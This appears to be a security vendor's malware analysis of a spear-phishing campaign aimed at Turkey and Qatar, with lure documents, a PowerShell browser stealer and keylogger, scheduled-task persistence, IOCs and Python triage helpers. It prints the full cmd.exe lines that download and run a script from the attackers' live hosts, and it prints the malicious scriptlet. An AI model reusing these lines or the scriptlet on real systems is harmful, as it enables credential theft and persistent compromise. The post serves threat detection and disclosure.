Spear-phishing campaign targeting Qatar and Turkey

Spear phishing campaign

During our daily threat-hunting activities we came across a tweet reporting an active spear-phishing campaign apparently targeting Turkey. After an initial assessment we decided to investigate further and found similarities with other campaigns active in the recent past, possibly run by the same actors.

Spear-phishing Documents

The spear-phishing documents target Turkish victims, and we managed to find an older one targeting victims in Qatar. The documents try to lure recipients with the conference of the association “Parliamentarians for Al Quds” in Istanbul. Parliamentarians for Al Quds is a committee that coordinates “the efforts of international parliamentarians to support the Palestine cause”.

Spear-phishing document

Google Translate helps non-Arabic speakers make sense of the content crafted for the spear-phishing campaign:

Spear-phishing text translated by Google

The document is an invitation to a conference to be held from the 13th to the 16th of December, titled “Jerusalem is the eternal capital of Palestine”. No announcement of this conference is currently published on the official website.

Infection strategy

Both documents follow the same traditional infection strategy: they try to lure the victim into clicking the “enable content” button so that a malicious macro runs:

Document heading requesting to enable macros

The embedded macro runs a command prompt that invokes powershell, which in turn runs the .ps1 script downloaded from a malicious host.

We have reconstructed the storyline using ReaQta-Hive:

ReaQta-Hive storyline

Winword.exe can be seen spawning an instance of cmd.exe with a suspicious command line:

"C:\Windows\System32\cmd.exe" /c " EcHo iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( 'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )^^^| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -"

Deobfuscating the command line reveals the real payload handed to powershell.exe:

IEX (New-Object Net.WebClient).DownloadString('http://microsoftdata.linkpc.net/api/cscript')
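The first stage can be reversed offline to verify the deobfuscation above without executing anything. This is an added Python example, not code from the page or from ReaQta; it assumes the blob is raw deflate as produced by .NET's DeflateStream, which is what the command line itself declares.

```python
import base64
import zlib

# Base64 blob quoted in the cmd.exe command line above (copied from the page).
STAGE1_B64 = (
    "BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUIS"
    "PYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/"
)


def decode_deflate_b64(blob: str) -> str:
    """Reverse [Convert]::FromBase64String -> DeflateStream(Decompress) -> ASCII.

    .NET's DeflateStream writes raw deflate with no zlib header, so zlib is asked
    for a raw stream via a negative window size; a plain zlib.decompress() on the
    same bytes fails with "incorrect header check".
    """
    raw = base64.b64decode(blob, validate=True)
    return zlib.decompress(raw, -zlib.MAX_WBITS).decode("ascii")


def encode_deflate_b64(text: str) -> str:
    """Forward direction, used only to build a known-good sample for self-checks."""
    comp = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    data = comp.compress(text.encode("ascii")) + comp.flush()
    return base64.b64encode(data).decode("ascii")


if __name__ == "__main__":
    try:
        print(decode_deflate_b64(STAGE1_B64))
    except (zlib.error, ValueError) as exc:
        print(f"stage 1 did not decode cleanly: {exc}")
```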

The way the payload is passed to powershell is interesting, as it appears to be a method to evade command-line monitoring:

pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -

The payload is “echoed” by cmd.exe straight into powershell.exe’s standard input (the trailing “-” makes powershell read its commands from stdin), which is why the usual iEx [...] parameter does not appear in the powershell.exe command line.
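A detection-side view of the same trick, as an added example (not ReaQta's code or the page's): it expands PowerShell's prefix-abbreviated switches so the randomised casing stops mattering, then flags the echo-to-stdin pattern on the two cmd.exe command lines quoted on this page (the deflate stage of the first is replaced by a placeholder in the sample).

```python
import re

# PowerShell accepts any unambiguous prefix of a parameter name, case-insensitively:
# that is all "-NoeX -nOlo -eXeCuTI BypAss -wiNdoWstYL hiDden" relies on.
PS_PARAMS = ("noexit", "nologo", "noprofile", "noninteractive", "executionpolicy",
             "windowstyle", "command", "encodedcommand", "file")

# The two cmd.exe command lines quoted on this page (constructed copies; the long
# deflate/base64 stage of the first one is replaced by a placeholder).
CMDLINE_NEW = ('"C:\\Windows\\System32\\cmd.exe" /c " EcHo iEx ( new-oBjeCt '
               'sYStem.Io.COmPreSSiON.defLAtEstreAm( <stage elided> )^^^| % {new-oBjeCt '
               'io.STreaMreader( $_ )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe '
               '-nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -"')
CMDLINE_OLD = ('"C:\\Windows\\System32\\cmd.exe" /C"Echo\\IEX (New-Object Net.WebClient)'
               ".DownloadString('http://4host.publicvm.com/api/cscript') | PowersHell "
               '-NOpROfIL -eX BYpAss -NOlOgo -wiNdoWs HiDdEN -noeXIt -noNI -"')


def normalise_switches(cmdline: str) -> str:
    """Expand abbreviated PowerShell switches to their full lower-case names."""
    out = []
    for tok in cmdline.split():
        if tok.startswith("-") and len(tok) > 1:
            hits = [p for p in PS_PARAMS if p.startswith(tok[1:].lower())]
            tok = "-" + hits[0] if len(hits) == 1 else tok.lower()
        out.append(tok)
    return " ".join(out)


def triage_cmdline(cmdline: str) -> list:
    """List the suspicious traits of a cmd.exe line that pipes into powershell."""
    low = cmdline.lower()
    # Split at the pipe that feeds powershell: the left side is what cmd echoes,
    # the right side is the powershell.exe command line an EDR actually records.
    m = re.search(r"\|\s*(powershell[^|]*)$", low)
    if not m:
        return []
    findings = []
    ps = normalise_switches(m.group(1)).rstrip('" ')
    if re.search(r"\becho\b", low[: m.start()]):
        findings.append("script-echoed-through-pipe")
    if ps.split()[-1] == "-":  # bare "-": powershell reads the script from stdin
        findings.append("powershell-reads-stdin")
    if "-executionpolicy bypass" in ps:
        findings.append("executionpolicy-bypass")
    if "-windowstyle hidden" in ps:
        findings.append("windowstyle-hidden")
    if "-noprofile" in ps and "-noninteractive" in ps:
        findings.append("noprofile-noninteractive")
    return findings
```

Both the current and the August 2018 command lines produce the same five findings once the switches are normalised, which is the point: the obfuscation only touches the spelling, not the behaviour.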

At this point powershell.exe runs the infection routine, leveraging the script downloaded from `hxxp://microsoftdata[.]linkpc[.]net/api/cscript`; below is an abstract of its content:

Script abstract

The powershell script is used to steal cookies, sessions and logins from Chrome, Opera and Firefox, and it additionally has a keylogging module. The acquired data is then exfiltrated to the following C2:

hxxp://microsoftdata[.]linkpc[.]net

The script downloads the SQLite DLLs required to read the browsers’ local databases (analysis window #4), creates a global mutex, Global\rYF1pgeADA, to avoid running multiple instances of the stealer, initializes the keylogger, cycles through the functions needed to capture the information and finally establishes persistence.

Stealer's code abstract

Particular attention should be given to the persistence mechanism: a scheduled task is used to persist a squiblydoo attack:

Persistence technique
Scheduled task

The following scriptlet is then executed:

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="rYF1pgeADA"
    classid="{3cf925ab-14c5-4324-9b5c-bbe294ac03a0}" >
    <script language="JScript">
        <![CDATA[
    
            p = 'Powershell';
            c = ' -WiND hiDdeN -nOproFILe -eXeCUTiON bypaSS -Nol -ComMa   "iEx ( new-oBjeCt  sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( \'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/\') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() "';
            r = new ActiveXObject("WScript.Shell").Run(p + c,0,false);
    
        ]]>
    </script>
    </registration>
</scriptlet>

ReaQta-Hive correctly identifies this behavior as anomalous and reconstructs the storyline as shown below:

Scriptlet storyline
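An added triage helper for the scriptlet above, not part of the original post: it pulls the registration attributes and the script body out of the .sct file and reports the behaviours a defender cares about. The embedded copy of the scriptlet is taken from the page with the long base64 stage replaced by a placeholder.

```python
import re

# The .sct file shown above (copied from the page; the base64 stage inside the
# PowerShell command is replaced by a placeholder to keep the sample short).
SCT = r'''<?XML version="1.0"?>
<scriptlet>
<registration
    progid="rYF1pgeADA"
    classid="{3cf925ab-14c5-4324-9b5c-bbe294ac03a0}" >
    <script language="JScript">
        <![CDATA[
            p = 'Powershell';
            c = ' -WiND hiDdeN -nOproFILe -eXeCUTiON bypaSS -Nol -ComMa   "iEx ( new-oBjeCt  sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( \'<base64 elided>\') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() "';
            r = new ActiveXObject("WScript.Shell").Run(p + c,0,false);
        ]]>
    </script>
    </registration>
</scriptlet>'''


def triage_scriptlet(text: str) -> dict:
    """Extract registration data and behavioural traits from a .sct scriptlet.

    Regexes instead of an XML parser on purpose: scrobj.dll is lenient, and this
    sample's upper-case "<?XML ...?>" declaration already trips strict parsers.
    """
    info = {"progid": None, "classid": None, "language": None, "findings": []}
    reg = re.search(r"<registration\b([^>]*)>", text, re.I)
    for attr in ("progid", "classid"):
        m = re.search(rf'{attr}\s*=\s*"([^"]*)"', reg.group(1), re.I) if reg else None
        info[attr] = m.group(1) if m else None
    m = re.search(r'<script\b[^>]*\blanguage\s*=\s*"([^"]*)"', text, re.I)
    info["language"] = m.group(1) if m else None
    body = "".join(re.findall(r"<!\[CDATA\[(.*?)\]\]>", text, re.S))
    checks = (
        ("wscript-shell", r'ActiveXObject\s*\(\s*["\']WScript\.Shell["\']\s*\)'),
        ("spawns-process", r"\.Run\s*\("),
        ("hidden-window", r"\.Run\s*\([^)]*,\s*0\s*,"),  # 2nd Run() argument 0 hides the window
        ("launches-powershell", r"powershell"),
        ("deflate-base64-stage", r"FromBase64String.*DeflateStream|DeflateStream.*FromBase64String"),
    )
    for name, pattern in checks:
        if re.search(pattern, body, re.I | re.S):
            info["findings"].append(name)
    return info
```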


Stealer Script Capabilities

As already mentioned, the script delivered in the spear-phishing campaign can steal cookies and login information from Google Chrome, Firefox and Opera, log keystrokes, and persist through a scheduled task that performs a squiblydoo attack. The script also accepts custom scripts deployed from the C2, which means its capabilities can be extended at will by the attackers.

We report the list of function signatures below for future reference:

function Set-Key
function Set-EncryptedData
function Uid
function  CookiesTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function  PasswordsTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function unProtecte ($data) 
function ChromeDB
function FirefoxDB
function OperaDB
function Add-SQLite ($link)
function urlPOST($link,$data) 
function OperaSESSION ($SQLiteDB,$search,$condition)
function FirefoxSESSION ($SQLiteDB,$search,$condition)
function ChromeSESSION ($SQLiteDB,$search,$condition)
function ChromePASS ($SQLiteDB)
function BrowsersLOGINS
function _sct
function InstallSCT
function BrowsersPS
function BrowsersLOGGER
function InitLOGGER
function BrowsersCOOKIES ($website,$cname)

The keylogger appears to reuse the code from the following GitHub repository:

https://github.com/lazywinadmin/PowerShell/blob/master/TOOL-Start-KeyLogger/Start-KeyLogger.ps1

C2 infrastructure and previous samples

The C2 presents an interesting pattern: the URL path is always of the form /api/{endpoint}:

http://{$domain}/api/cscript
http://{$domain}/api/pscript
http://{$domain}/api/logger/submit
http://{$domain}/api/chrome/submit
http://{$domain}/api/firefox/submit
http://{$domain}/api/opera/submit
http://{$domain}/assest/sqlite

Thanks to the above information, we were able to discover additional samples using the same pattern in previous spear-phishing campaigns.

As pointed out at the beginning, this older sample appeared to target victims in Qatar, at that time by posing as Qatar Charity.

The document was first observed at the beginning of August 2018; there are only minor code changes compared to the current one, mainly slight alterations in behavior, persistence and the script’s code:

Previous spear-phishing campaign storyline

We have uploaded a behavioral analysis to VirusTotal (click on the detailed report to access it). In analysis window #1 we can see that cmd.exe’s command line uses no obfuscation:

"C:\Windows\System32\cmd.exe" /C"Echo\IEX (New-Object Net.WebClient).DownloadString('http://4host.publicvm.com/api/cscript') | PowersHell -NOpROfIL -eX BYpAss -NOlOgo -wiNdoWs HiDdEN -noeXIt -noNI -"

For completeness, here are the changes from the previous version of the powershell script:

| Capability | Old Version | New Version |
| --- | --- | --- |
| Persistence | scheduled task (via powershell) | scheduled task (via regsvr32) |
| Keylogger | Not found | Present |
| Mutex | wfCQnIo2G7 | rYF1pgeADA |

Old panel URL:

hxxp://4host[.]publicvm[.]com/

Code changes

The three documents share a similar metadata structure:

| Metadata | Old Version | New Version |
| --- | --- | --- |
| AppVersion | 12.0 | 16.0 |
| Author | Mohamed Bennabszllah | Parliament Quds |
| CompObjUserType | Document Microsoft Office Word 97-2003 | Document Microsoft Office Word 97-2003 |
| CreateDate | 2018:08:05 16:16:00 | 2018:11:21 14:50:00 |
| LanguageCode | English (US) | Arabic |
| CodePage | Windows Latin 1 (Western European) | Windows Arabic |
| LastModifiedBy | DELL | Mohamed Bennabszllah |
| LastPrinted | 0000:00:00 00:00:00 | 2018:10:19 17:14:00Z |
| ModifyDate | 2018:08:05 16:32:00 | 2018:11:22 12:20:00 |
| System | Windows | Windows |

We can observe another similarity: both domains use the same free Dynamic DNS service, DNSExit.

linkpc domain
publicvm domain

Final words

This attack is interesting because of the potential targets involved but also because of the techniques adopted: use of system binaries (lolbins) to perform malicious activity via powershell, scheduled-task persistence and the “echoing” technique used to hide the command line and make detection harder. This threat actor appears to be active, and the type of documents retrieved suggests that these operations are likely politically motivated rather than the work of a cyber-crime gang.

Spear-phishing remains one of the most effective vectors, and even trained personnel can easily become victims. ReaQta-Hive helps by automatically detecting targeted threats like the ones just analysed using artificial intelligence, and it enables analysts to perform in-depth threat hunting and automated discovery of behavioral anomalies. In-memory threats leveraging operating-system components (lolbins) are capable of bypassing traditional and legacy defenses while leaving a smaller forensic footprint, given the absence of a traditional binary payload. Get in touch with us for a live demonstration and to understand how to address similar threats in real time.

IOCs

1d2bbe3fd9021bbed4667628b86156bee8763b3d93cdac6de398c751a281a324 دعوة.doc 
bf4d4ee4a8e4472c7968586fa0318e556a89bfd94aeb4e72afd99ab340541770 إستمارة.doc 
7a26d5b600a078816beb3a2849827fa7d45ec85ec6c3343b3857f10edfece74c cscript.ps1
hxxp://microsoftdata[.]linkpc[.]net

7c8cf1e3ec35a6f604699f6481f3463e9ae19c93b8efd861b914c8260304d314 qatar.doc
hxxp://4host[.]publicvm[.]com

Global\rYF1pgeADA mutex
Global\wfCQnIo2G7 mutex 

http://{$domain}/api/cscript
http://{$domain}/api/pscript
http://{$domain}/api/logger/submit
http://{$domain}/api/chrome/submit
http://{$domain}/api/firefox/submit
http://{$domain}/api/opera/submit
http://{$domain}/assest/sqlite

rYF1pgeADA scheduled task name
wfCQnIo2G7 scheduled task name